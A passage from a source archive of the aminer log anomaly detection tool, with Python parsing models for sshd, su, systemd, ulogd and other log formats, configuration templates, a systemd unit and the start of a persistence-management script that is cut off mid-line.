]) ]), FixedDataModelElement("s1", b" for "), user_name_model, FixedDataModelElement("s2", from_str), IpAddressDataModelElement("clientip"), FixedDataModelElement("s3", port), DecimalIntegerValueModelElement("port"), OptionalMatchModelElement("idinfo", SequenceModelElement("idinfo", [ FixedDataModelElement("s0", b" id "), DecimalIntegerValueModelElement("id") ])) ]), SequenceModelElement("transferred", [ FixedDataModelElement("s0", b"Transferred: sent "), DecimalIntegerValueModelElement("sent"), FixedDataModelElement("s1", b", received "), DecimalIntegerValueModelElement("received"), FixedDataModelElement("s1", b" bytes")]), SequenceModelElement("pam", [ FixedDataModelElement("s0", b"pam_unix(sshd:session): session "), FixedWordlistDataModelElement("change", [b"opened", b"closed"]), FixedDataModelElement("s1", b" for user "), user_name_model, OptionalMatchModelElement("openby", FixedDataModelElement("default", b" by (uid=0)")) ]), SequenceModelElement("child", [ FixedDataModelElement("s0", b"User child is on pid "), DecimalIntegerValueModelElement("pid") ]), SequenceModelElement("failed/accept", [ FixedWordlistDataModelElement("s0", [b"Failed ", b"Accepted "]), FixedWordlistDataModelElement("type", [b"password", b"none", b"publickey"]), FixedDataModelElement("s1", b" for "), OptionalMatchModelElement("opt", FixedDataModelElement("invalid", b"invalid user ")), DelimitedDataModelElement("user", b" "), FixedDataModelElement("s2", b" from "), FirstMatchModelElement("fm", [ IpAddressDataModelElement("from_ip"), IpAddressDataModelElement("from_ip_v6", ipv6=True) ]), FixedDataModelElement("s3", b" port "), DecimalIntegerValueModelElement("port"), AnyByteDataModelElement("service") ]), SequenceModelElement("disconnecting", [ FixedDataModelElement("s0", b"Disconnecting "), FixedWordlistDataModelElement("type", [b"authenticating", b"invalid"]), FixedDataModelElement("s1", b" user "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("s1", b" "), IpAddressDataModelElement("ip"), FixedDataModelElement("s2", b" port "), DecimalIntegerValueModelElement("port"), FixedDataModelElement("s3", b": Too many authentication failures [preauth]") ]), SequenceModelElement("fatal", [ FixedDataModelElement("s0", b"fatal: Timeout before authentication for "), IpAddressDataModelElement("ip"), FixedDataModelElement("s1", b" port "), DecimalIntegerValueModelElement("port") ]), SequenceModelElement("cert-auth", [ FixedDataModelElement("s0", b"cert: Authentication tried for "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("s1", b" with valid certificate but not from a permitted source address ("), IpAddressDataModelElement("ip"), FixedDataModelElement("s2", b")."), ]), SequenceModelElement("change-root-dir", [ FixedDataModelElement("s0", b"Changed root directory to \""), DelimitedDataModelElement("root-dir", b"\""), FixedDataModelElement("s1", b"\"") ]), FixedDataModelElement("subsystem-request", b"subsystem request for sftp"), SequenceModelElement("conn-write-poll", [ FixedDataModelElement("s0", b"packet_write_poll: Connection from "), IpAddressDataModelElement("from_ip"), FixedDataModelElement("s1", b" port "), DecimalIntegerValueModelElement("port"), FixedDataModelElement("s2", b": Host is down") ]), SequenceModelElement("debug", [ FixedDataModelElement("s0", b"debug"), DecimalIntegerValueModelElement("debug-num"), FixedDataModelElement("s1", b": "), FirstMatchModelElement("fm", [ SequenceModelElement("seq1", [ FixedDataModelElement("s2", b"Got "), DecimalIntegerValueModelElement("num1"), FixedDataModelElement("s3", b"/"), DecimalIntegerValueModelElement("num2"), FixedDataModelElement("s4", b" for keepalive") ]), SequenceModelElement("seq2", [ FixedDataModelElement("s2", b"channel "), DecimalIntegerValueModelElement("channel-num"), FixedDataModelElement("s3", b": request "), DelimitedDataModelElement("mail", b" "), FixedDataModelElement("s4", b" confirm "), DecimalIntegerValueModelElement("num") ]), SequenceModelElement("seq3", [ FixedDataModelElement("s2", b"send packet: type "), DecimalIntegerValueModelElement("packet-type") ]), SequenceModelElement("seq4", [ FixedDataModelElement("s2", b"receive packet: type "), DecimalIntegerValueModelElement("packet-type") ]), FixedDataModelElement("do-cleanup", b"do_cleanup"), SequenceModelElement("seq5", [ FixedDataModelElement("s2", b"session_pty_cleanup: session "), DecimalIntegerValueModelElement("sess-num"), FixedDataModelElement("s3", b" release "), AnyByteDataModelElement("file") ]) ]) ]), SequenceModelElement("pam_succeed_if", [ FixedDataModelElement("s0", b"pam_succeed_if(sshd:auth): requirement \"uid >= "), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s1", b"\" not met by user \""), DelimitedDataModelElement("user", b"\""), FixedDataModelElement("s2", b"\"") ]), ] model = SequenceModelElement("sshd", [ FixedDataModelElement("sname", b"sshd["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s0", b"]: "), FirstMatchModelElement("msg", type_children) ]) return model logdata-anomaly-miner-2.6.1/source/root/etc/aminer/conf-available/generic/SsmtpParsingModel.py000066400000000000000000000032041437606560100324650ustar00rootroot00000000000000"""This module defines a parser for ssmtp.""" from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement def get_model(): """Return the model.""" type_children = [ SequenceModelElement("sent", [ FixedDataModelElement("s0", b"Sent mail for "), DelimitedDataModelElement("to-addr", b" ("), FixedDataModelElement("s1", b" ("), DelimitedDataModelElement("status", b") uid="), FixedDataModelElement("s2", b") uid="), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s3", b" username="), DelimitedDataModelElement("username", b" outbytes="), FixedDataModelElement("s4", b" outbytes="), DecimalIntegerValueModelElement("bytes") ]), SequenceModelElement("sent", [ DelimitedDataModelElement("program", b" "), FixedDataModelElement("s0", b" sent mail for "), AnyByteDataModelElement("user") ]) ] model = SequenceModelElement("ssmtp", [ FixedDataModelElement("sname", b"sSMTP["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s0", b"]: "), FirstMatchModelElement("msg", type_children) ]) return model logdata-anomaly-miner-2.6.1/source/root/etc/aminer/conf-available/generic/SuSessionParsingModel.py000066400000000000000000000046401437606560100333170ustar00rootroot00000000000000"""This module defines a parser for susession.""" from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement def get_model(user_name_model=None): """Return a model to parse a su session information message after any standard logging preamble, e.g. from syslog.""" if user_name_model is None: user_name_model = VariableByteDataModelElement("user", b"0123456789abcdefghijklmnopqrstuvwxyz.-") srcuser_name_model = VariableByteDataModelElement("srcuser", b"0123456789abcdefghijklmnopqrstuvwxyz.-") type_children = [ SequenceModelElement("su-good", [ FixedDataModelElement("s0", b"Successful su for "), user_name_model, FixedDataModelElement("s1", b" by "), srcuser_name_model]), SequenceModelElement("su-good", [ FixedDataModelElement("s0", b"+ "), DelimitedDataModelElement("terminal", b" "), FixedDataModelElement("s1", b" "), srcuser_name_model, FixedDataModelElement("s2", b":"), user_name_model ]), SequenceModelElement("pam", [ FixedDataModelElement("s0", b"pam_unix(su:session): session "), FixedWordlistDataModelElement("change", [b"opened", b"closed"]), FixedDataModelElement("s1", b" for user "), user_name_model, OptionalMatchModelElement("openby", SequenceModelElement("userinfo", [ FixedDataModelElement("s0", b" by (uid="), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s1", b")") ])) ]) ] model = SequenceModelElement("su", [ FixedDataModelElement("sname", b"su["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s0", b"]: "), FirstMatchModelElement("msg", type_children) ]) return model logdata-anomaly-miner-2.6.1/source/root/etc/aminer/conf-available/generic/SyslogPreambleModel.py000066400000000000000000000023461437606560100327710ustar00rootroot00000000000000"""This module defines a parser for syslog.""" from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement def get_model(time_model=None): """ Return the model for parsing a standard syslog preamble including timestamp and hostname. @param time_model when not none, the given model element is used for parsing timestamps. Otherwise a standard DateTimeModelElement with format b"%b %d %H:%M:%S" is created. CAVEAT: the standard model may not work when log data timestamp locale does not match host or shell environment locale. See MultiLocaleDatetime_modelElement instead. """ if time_model is None: time_model = DateTimeModelElement("time", b"%b %d %H:%M:%S", start_year=2020) host_name_model = VariableByteDataModelElement("host", b"-.01234567890abcdefghijklmnopqrstuvwxyz") model = SequenceModelElement("syslog", [ time_model, FixedDataModelElement("sp0", b" "), host_name_model, FixedDataModelElement("sp1", b" ") ]) return model logdata-anomaly-miner-2.6.1/source/root/etc/aminer/conf-available/generic/SystemdParsingModel.py000066400000000000000000000143101437606560100330070ustar00rootroot00000000000000"""This module contains functions and classes to create the parsing model.""" from aminer.parsing.DecimalFloatValueModelElement import DecimalFloatValueModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement def get_model(): """Return the model of all three types.""" model = FirstMatchModelElement("systemd-fm", [ get_systemd_model(), get_logind_model(), get_tmp_files_model() ]) return model def get_systemd_model(): """Return the parsing model for messages directly from systemd.""" type_children = [ FixedDataModelElement("apt-daily-start", b"Starting Daily apt upgrade and clean activities..."), FixedDataModelElement("apt-daily-started", b"Started Daily apt upgrade and clean activities."), FixedDataModelElement("apt-daily-finished", b"Finished Daily apt upgrade and clean activities."), SequenceModelElement("service-succeeded", [ DelimitedDataModelElement("service", b" "), FixedDataModelElement("s0", b" Succeeded.") ]), FixedDataModelElement("clean-php", b"Finished Clean php session files."), FixedDataModelElement("finished-logrotate", b"Finished Rotate log files."), FixedDataModelElement("finished-man-db-daily", b"Finished Daily man-db regeneration."), FixedDataModelElement("finished-ubuntu-advantages", b"Finished Ubuntu Advantage APT and MOTD Messages."), FixedDataModelElement("finished-refresh", b"Finished Refresh fwupd metadata and update motd."), FixedDataModelElement("finished-daily-apt", b"Finished Daily apt download activities."), SequenceModelElement("apt-daily-timer", [ FixedDataModelElement("s0", b"apt-daily.timer: Adding "), OptionalMatchModelElement("hopt", SequenceModelElement("hblock", [ DecimalIntegerValueModelElement("hours"), FixedDataModelElement("s1", b"h ") ])), DecimalIntegerValueModelElement("minutes"), FixedDataModelElement("s2", b"min "), DecimalFloatValueModelElement("seconds"), FixedDataModelElement("s3", b"s random time.") ]), FixedDataModelElement("tmp-file-cleanup", b"Starting Cleanup of Temporary Directories..."), FixedDataModelElement("tmp-file-cleanup-started", b"Started Cleanup of Temporary Directories."), SequenceModelElement("killing-process", [ DelimitedDataModelElement("service", b":"), FixedDataModelElement("s0", b": Killing process "), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s1", b" (update-notifier) with signal SIGKILL.") ]), SequenceModelElement("starting", [ FixedDataModelElement("s0", b"Starting "), DelimitedDataModelElement("service", b"."), FixedDataModelElement("s1", b"...") ]), SequenceModelElement("started", [ FixedDataModelElement("s0", b"Started "), DelimitedDataModelElement("service", b".", consume_delimiter=True) ]), FixedDataModelElement("reloading", b"Reloading.") ] model = SequenceModelElement("systemd", [ FixedDataModelElement("sname", b"systemd["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s0", b"]: "), FirstMatchModelElement("msg", type_children) ]) return model def get_logind_model(user_name_model=None): """Return a model to parse a systemd logind daemon message after any standard logging preamble, e.g. from syslog.""" if user_name_model is None: user_name_model = VariableByteDataModelElement("user", b"0123456789abcdefghijklmnopqrstuvwxyz-_") type_children = [ SequenceModelElement("new session", [ FixedDataModelElement("s0", b"New session "), DecimalIntegerValueModelElement("session"), FixedDataModelElement("s1", b" of user "), user_name_model, FixedDataModelElement("s2", b".") ]), SequenceModelElement("removed session", [ FixedDataModelElement("s0", b"Removed session "), DecimalIntegerValueModelElement("session"), FixedDataModelElement("s1", b".") ]), SequenceModelElement("logged out", [ FixedDataModelElement("s0", b"Session "), DecimalIntegerValueModelElement("session"), FixedDataModelElement("s1", b" logged out. Waiting for processes to exit.") ]), FixedDataModelElement("failed abandon", b"Failed to abandon session scope: Transport endpoint is not connected") ] # Will fail on username models including the dot at the end. model = SequenceModelElement("systemd-logind", [ FixedDataModelElement("sname", b"systemd-logind["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s0", b"]: "), FirstMatchModelElement("msg", type_children) ]) return model def get_tmp_files_model(): """Return a model to parse a systemd tmpfiles daemon message after any standard logging preamble, e.g. from syslog.""" type_children = [ SequenceModelElement("duplicate", [ FixedDataModelElement("s0", b'[/usr/lib/tmpfiles.d/var.conf:14] Duplicate line for path "'), DelimitedDataModelElement("path", b'", ignoring.'), FixedDataModelElement("s2", b'", ignoring.') ]) ] # Will fail on username models including the dot at the end. model = SequenceModelElement("systemd-tmpfiles", [ FixedDataModelElement("sname", b"systemd-tmpfiles["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s0", b"]: "), FirstMatchModelElement("msg", type_children) ]) return model logdata-anomaly-miner-2.6.1/source/root/etc/aminer/conf-available/generic/TomcatParsingModel.py000066400000000000000000000020221437606560100326030ustar00rootroot00000000000000"""This module defines a parser for tomcat.""" from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement def get_model(): """Return the model.""" type_children = [ FixedDataModelElement("start", b" * Starting Tomcat servlet engine tomcat7"), FixedDataModelElement("stop", b" * Stopping Tomcat servlet engine tomcat7"), FixedDataModelElement("done", b" ...done."), AnyByteDataModelElement("unparsed") ] model = SequenceModelElement("tomcat7", [ FixedDataModelElement("sname", b"tomcat7["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s0", b"]: "), FirstMatchModelElement("msg", type_children) ]) return model logdata-anomaly-miner-2.6.1/source/root/etc/aminer/conf-available/generic/UlogdParsingModel.py000066400000000000000000000131671437606560100324420ustar00rootroot00000000000000"""This module defines the parser for ulogd messages.""" from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement def get_model(): """Return a model for su session information messages after any standard logging preamble, e.g. from syslog.""" type_children = [ SequenceModelElement("build-stack", [ FixedDataModelElement("s0", b"building new pluginstance stack: \""), DelimitedDataModelElement("stack", b"\""), FixedDataModelElement("s1", b"\"") ]), SequenceModelElement("nfct-event", [ FixedDataModelElement("s0", b"[DESTROY] ORIG: SRC="), IpAddressDataModelElement("osrcip"), FixedDataModelElement("s1", b" DST="), IpAddressDataModelElement("odstip"), FixedDataModelElement("s2", b" PROTO="), FixedWordlistDataModelElement("proto", [b"TCP", b"UDP"]), FixedDataModelElement("s3", b" SPT="), DecimalIntegerValueModelElement("ospt"), FixedDataModelElement("s4", b" DPT="), DecimalIntegerValueModelElement("odpt"), FixedDataModelElement("s5", b" PKTS="), DecimalIntegerValueModelElement("opkts"), FixedDataModelElement("s6", b" BYTES="), DecimalIntegerValueModelElement("obytes"), FixedDataModelElement("s7", b" , REPLY: SRC="), IpAddressDataModelElement("rsrcip"), FixedDataModelElement("s8", b" DST="), IpAddressDataModelElement("rdstip"), FixedDataModelElement("s9", b" PROTO="), FixedWordlistDataModelElement("rproto", [b"TCP", b"UDP"]), FixedDataModelElement("s10", b" SPT="), DecimalIntegerValueModelElement("rspt"), FixedDataModelElement("s11", b" DPT="), DecimalIntegerValueModelElement("rdpt"), FixedDataModelElement("s12", b" PKTS="), DecimalIntegerValueModelElement("rpkts"), FixedDataModelElement("s13", b" BYTES="), DecimalIntegerValueModelElement("rbytes"), # No additional whitespace from Ubuntu Trusty 14.04 on. OptionalMatchModelElement("tail", FixedDataModelElement("s0", b" ")) ]), FixedDataModelElement("nfct-plugin", b"NFCT plugin working in event mode"), FixedDataModelElement("reopen", b"reopening capture file"), FixedDataModelElement("signal", b"signal received, calling pluginstances"), FixedDataModelElement("uidchange", b"Changing UID / GID"), SequenceModelElement("seq", [ FixedDataModelElement("s0", b"id=\""), DecimalIntegerValueModelElement("id"), FixedDataModelElement("s1", b"\" severity=\""), DelimitedDataModelElement("severity", b"\""), FixedDataModelElement("s2", b"\" sys=\""), DelimitedDataModelElement("sys", b"\""), FixedDataModelElement("s3", b"\" sub=\""), DelimitedDataModelElement("sub", b"\""), FixedDataModelElement("s4", b"\" name=\""), DelimitedDataModelElement("name", b"\""), FixedDataModelElement("s5", b"\" action=\""), DelimitedDataModelElement("action", b"\""), FixedDataModelElement("s6", b"\" fwrule=\""), DelimitedDataModelElement("fwrule", b"\""), FixedDataModelElement("s7", b"\" initf=\""), DelimitedDataModelElement("initf", b"\""), FixedDataModelElement("s8", b"\" srcmac=\""), DelimitedDataModelElement("srcmac", b"\""), FixedDataModelElement("s9", b"\" dstmac=\""), DelimitedDataModelElement("dstmac", b"\""), FixedDataModelElement("s10", b"\" srcip=\""), DelimitedDataModelElement("srcip", b"\""), FixedDataModelElement("s11", b"\" dstip=\""), DelimitedDataModelElement("dstip", b"\""), FixedDataModelElement("s12", b"\" proto=\""), DelimitedDataModelElement("proto", b"\""), FixedDataModelElement("s13", b"\" length=\""), DelimitedDataModelElement("length", b"\""), FixedDataModelElement("s14", b"\" tos=\""), DelimitedDataModelElement("tos", b"\""), FixedDataModelElement("s15", b"\" prec=\""), DelimitedDataModelElement("prec", b"\""), FixedDataModelElement("s16", b"\" ttl=\""), DelimitedDataModelElement("ttl", b"\""), FixedDataModelElement("s17", b"\" srcport=\""), DelimitedDataModelElement("srcport", b"\""), FixedDataModelElement("s18", b"\" dstport=\""), DelimitedDataModelElement("dstport", b"\""), FixedDataModelElement("s19", b"\" tcpflags=\""), DelimitedDataModelElement("tcpflags", b"\""), FixedDataModelElement("s20", b"\"") ]) ] # Netflow entry model = SequenceModelElement("ulogd", [ FixedDataModelElement("sname", b"ulogd["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s0", b"]: "), FirstMatchModelElement("msg", type_children) ]) return model logdata-anomaly-miner-2.6.1/source/root/etc/aminer/conf-enabled/000077500000000000000000000000001437606560100245375ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/etc/aminer/conf-enabled/Readme.txt000066400000000000000000000007121437606560100264750ustar00rootroot00000000000000This directory contains files enabled to be included in the analysis pipeline configuration. The files are made available by including this directory within the site packages. If you have objections enabling all the python site packages stored on this host within a process running with elevated privileges, you can also include only some site package components by placing symlinks here, e.g. ln -s /usr/lib/python3.6/dist-packages/pytz conf-enabled/pytz logdata-anomaly-miner-2.6.1/source/root/etc/aminer/template_config.py000066400000000000000000000113541437606560100257400ustar00rootroot00000000000000# This is a template for the "aminer" logdata-anomaly-miner tool. Copy # it to "config.py" and define your ruleset. For more examples of component # usage see aecid-testsuite/demo/aminer/demo-config.py. config_properties = {} # Define the list of log resources to read from: the resources # named here do not need to exist when aminer is started. This # will just result in a warning. However if they exist, they have # to be readable by the aminer process! Supported types are: # * file://[path]: Read data from file, reopen it after rollover # * unix://[path]: Open the path as UNIX local socket for reading config_properties['LogResourceList'] = ['file:///tmp/syslog'] # Define the uid/gid of the process that runs the calculation # after opening the log files: config_properties['AminerUser'] = 'aminer' config_properties['AminerGroup'] = 'aminer' learn_mode = True # Read and store information to be used between multiple invocations # of aminer in this directory. The directory must only be accessible # to the 'AminerUser' but not group/world readable. On violation, # aminer will refuse to start. When undefined, '/var/lib/aminer' # is used. # config_properties['Core.PersistenceDir'] = '/var/lib/aminer' # Set the Unix-Domain-Socket for RemoteControl # RemoteControlSocket: '/var/lib/aminer/log/remcontrol.sock' # Add your ruleset here: def build_analysis_pipeline(analysis_context): """ Define the function to create pipeline for parsing the log data. It has also to define an AtomizerFactory to instruct aminer how to process incoming data streams to create log atoms from them. """ # Build the parsing model: from aminer.parsing.SequenceModelElement import SequenceModelElement import ApacheAccessModel apache_access_model = ApacheAccessModel.get_model() parsing_model = SequenceModelElement('model', [apache_access_model]) # Some generic imports. from aminer.analysis import AtomFilters # Create all global handler lists here and append the real handlers # later on. # Use this filter to distribute all atoms to the analysis handlers. atom_filter = AtomFilters.SubhandlerFilter(None) anomaly_event_handlers = [] # Now define the AtomizerFactory using the model. A simple line # based one is usually sufficient. from aminer.input.SimpleByteStreamLineAtomizerFactory import SimpleByteStreamLineAtomizerFactory analysis_context.atomizer_factory = SimpleByteStreamLineAtomizerFactory( parsing_model, [atom_filter], anomaly_event_handlers, default_timestamp_path_list='/model/accesslog/time') # Just report all unparsed atoms to the event handlers. from aminer.analysis.UnparsedAtomHandlers import SimpleUnparsedAtomHandler atom_filter.add_handler(SimpleUnparsedAtomHandler(anomaly_event_handlers), stop_when_handled_flag=True) from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector new_match_path_detector = NewMatchPathDetector(analysis_context.aminer_config, anomaly_event_handlers, learn_mode=learn_mode) analysis_context.register_component(new_match_path_detector, component_name=None) atom_filter.add_handler(new_match_path_detector) # Check if status-code changed from aminer.analysis.NewMatchPathValueDetector import NewMatchPathValueDetector new_match_path_value_detector = NewMatchPathValueDetector( analysis_context.aminer_config, ["/model/accesslog/status"], anomaly_event_handlers, learn_mode=learn_mode) analysis_context.register_component(new_match_path_value_detector, component_name=None) atom_filter.add_handler(new_match_path_value_detector) # Check if HTTP-Method for a HTTP-Request has changed from aminer.analysis.NewMatchPathValueComboDetector import NewMatchPathValueComboDetector new_match_path_value_combo_detector = NewMatchPathValueComboDetector(analysis_context.aminer_config, [ "/model/accesslog/request", "/model/accesslog/method"], anomaly_event_handlers, learn_mode=learn_mode) analysis_context.register_component(new_match_path_value_combo_detector, component_name=None) atom_filter.add_handler(new_match_path_value_combo_detector) # Check if HTTP-Statuscode for a HTTP-Request has changed new_match_path_value_combo_detector2 = NewMatchPathValueComboDetector(analysis_context.aminer_config, [ "/model/accesslog/request", "/model/accesslog/status"], anomaly_event_handlers, learn_mode=learn_mode) analysis_context.register_component(new_match_path_value_combo_detector2, component_name=None) atom_filter.add_handler(new_match_path_value_combo_detector2) # Add stdout stream printing for debugging, tuning. from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler anomaly_event_handlers.append(StreamPrinterEventHandler(analysis_context)) logdata-anomaly-miner-2.6.1/source/root/etc/aminer/template_config.yml000066400000000000000000000113731437606560100261120ustar00rootroot00000000000000# This is a template for the "aminer" logdata-anomaly-miner tool. Copy # it to "config.yml" and define your ruleset. For more examples of component # usage see aecid-testsuite/demo/aminer/demo-config.yml. #LearnMode: false # optional AminerUser: 'aminer' # optional default: aminer AminerGroup: 'aminer' # optional default: aminer LogResourceList: - 'file:///var/log/apache2/access.log' # - 'unix:///var/lib/akafka/aminer.sock' # Read and store information to be used between multiple invocations # of aminer in this directory. The directory must only be accessible # to the 'AminerUser' but not group/world readable. On violation, # aminer will refuse to start. When undefined, '/var/lib/aminer' # is used. # Core.PersistenceDir: '/var/lib/aminer' # Directory for logfiles. Default: /var/lib/aminer/log # Core.LogDir: '/var/lib/aminer/log' # Define a target e-mail address to send alerts to. When undefined, # no e-mail notification hooks are added. # MailAlerting.TargetAddress: 'root@localhost' # Sender address of e-mail alerts. When undefined, "sendmail" # implementation on host will decide, which sender address should # be used. # MailAlerting.FromAddress: 'root@localhost' # Define, which text should be prepended to the standard aminer # subject. Defaults to "aminer Alerts:" # MailAlerting.SubjectPrefix: 'aminer Alerts:' # Define a grace time after startup before aminer will react to # an event and send the first alert e-mail. Defaults to 0 (any # event can immediately trigger alerting). # MailAlerting.AlertGraceTime: 0 # Define how many seconds to wait after a first event triggered # the alerting procedure before really sending out the e-mail. # In that timespan, events are collected and will be sent all # using a single e-mail. Defaults to 10 seconds. # MailAlerting.EventCollectTime: 10 # Define the minimum time between two alert e-mails in seconds # to avoid spamming. All events during this timespan are collected # and sent out with the next report. Defaults to 600 seconds. # MailAlerting.MinAlertGap: 600 # Define the maximum time between two alert e-mails in seconds. # When undefined this defaults to "MailAlerting.MinAlertGap". # Otherwise this will activate an exponential backoff to reduce # messages during permanent error states by increasing the alert # gap by 50% when more alert-worthy events were recorded while # the previous gap time was not yet elapsed. # MailAlerting.MaxAlertGap: 600 # Define how many events should be included in one alert mail # at most. This defaults to 1000 # MailAlerting.MaxEventsPerMessage: 1000 # Configure the logline prefix # LogPrefix: '' ######################################################### # #Parser: # - id: 'timeModel' # type: DateTimeModelElement # name: 'time' # args: '%Y-%m-%dT%H:%M:%S.%f' # # - id: 'hostModel' # type: VariableByteDataModelElement # name: 'host' # args: '-.01234567890abcdefghijklmnopqrstuvwxyz:' # # - id: 'reqMethodModel' # type: FixedWordlistDataModelElement # name: 'method' # args: # - 'GET' # - 'POST' # - 'PUT' # - 'HEAD' # - id: 'apacheModel' # type: ApacheAccessModel # name: 'apache' # args: 'apache' # # - id: 'START' # start: True # type: SequenceModelElement # name: 'model' # args: # - timeModel # - hostModel # - reqMethodModel # - apacheModel Parser: - id: 'apacheModel' type: ApacheAccessModel name: 'apache' args: 'apache' - id: 'startModel' start: True type: SequenceModelElement name: 'model' args: - apacheModel Input: multi_source: False # optional timestamp_paths: "/model/accesslog/time" Analysis: - type: "NewMatchPathValueDetector" paths: ["/model/accesslog/status"] persistence_id: 'accesslog_status' # optional default: Default output_logline: false learn_mode: true - type: "NewMatchPathValueComboDetector" paths: ["/model/accesslog/request","/model/accesslog/method"] learn_mode: true persistence_id: 'accesslog_request' # optional default: Default output_logline: false allow_missing_values: false # optional default: false - type: "NewMatchPathValueComboDetector" paths: ["/model/accesslog/request","/model/accesslog/status"] learn_mode: true EventHandlers: - id: "stpe" json: true # optional default: false type: "StreamPrinterEventHandler" - id: "syslog" type: "SyslogWriterEventHandler" logdata-anomaly-miner-2.6.1/source/root/lib/000077500000000000000000000000001437606560100207425ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/lib/systemd/000077500000000000000000000000001437606560100224325ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/lib/systemd/system/000077500000000000000000000000001437606560100237565ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/lib/systemd/system/aminer.service000066400000000000000000000012741437606560100266170ustar00rootroot00000000000000[Unit] Description=aminer log data mining server Documentation=man:aminer(1) [Service] Type=simple ExecStartPre=/usr/bin/touch /var/log/aminer.log ExecStartPre=/bin/chown aminer:aminer /var/log/aminer.log ExecStart=/usr/lib/logdata-anomaly-miner/aminer.py --config /etc/aminer/config.yml KillMode=control-group Restart=on-failure # Write everything to /dev/null: if aminer is misconfigured, it # may detect anonamies in its own log data, thus creating a logging # loop. You may prefer logging to journal only, which needs journald # to be reconfigured with "ForwardToSyslog=false". StandardOutput=file:/var/log/aminer.log StandardError=file:/var/log/aminer.log [Install] WantedBy=multi-user.target logdata-anomaly-miner-2.6.1/source/root/usr/000077500000000000000000000000001437606560100210055ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/000077500000000000000000000000001437606560100215535ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/000077500000000000000000000000001437606560100257345ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer-persistence.py000077500000000000000000000115141437606560100321100ustar00rootroot00000000000000#!/usr/bin/python3 -BbbEIsSttW all import sys import os import re import argparse sys.path = sys.path[1:] + ['/usr/lib/logdata-anomaly-miner', '/etc/aminer/conf-enabled'] from aminer.AminerConfig import load_config, KEY_AMINER_USER, KEY_AMINER_GROUP, KEY_PERSISTENCE_DIR # skipcq: FLK-E402 from aminer.util.StringUtil import colflame, flame, supports_color # skipcq: FLK-E402 from aminer.util.PersistenceUtil import clear_persistence, copytree # skipcq: FLK-E402 from metadata import __version_string__ # skipcq: FLK-E402 def main(): """Run the aminer-persistence program.""" # Extract program name, but only when sure to contain no problematic characters. program_name = sys.argv[0].split('/')[-1] if (program_name == '.') or (program_name == '..') or (re.match('^[a-zA-Z0-9._-]+$', program_name) is None): print('Invalid program name, check your execution args', file=sys.stderr) sys.exit(1) help_message = 'aminer-persistence\n' if supports_color(): help_message += colflame else: help_message += flame help_message += 'For further information read the man pages running "man aminerRemoteControl".' parser = argparse.ArgumentParser(description=help_message, formatter_class=argparse.RawTextHelpFormatter) parser.add_argument('-v', '--version', action='version', version=__version_string__) parser.add_argument('-c', '--config', type=str, help='path to the config-file') parser.add_argument('-l', '--list', action='store_true', help='list all existing backups') parser.add_argument('-b', '--backup', action='store_true', help='create a backup with the current datetime') parser.add_argument('-r', '--restore', type=str, help='restore a persistence backup') parser.add_argument('-u', '--user', type=str, help='set the aminer user. Only used with --restore') parser.add_argument('-g', '--group', type=str, help='set the aminer group. Only used with 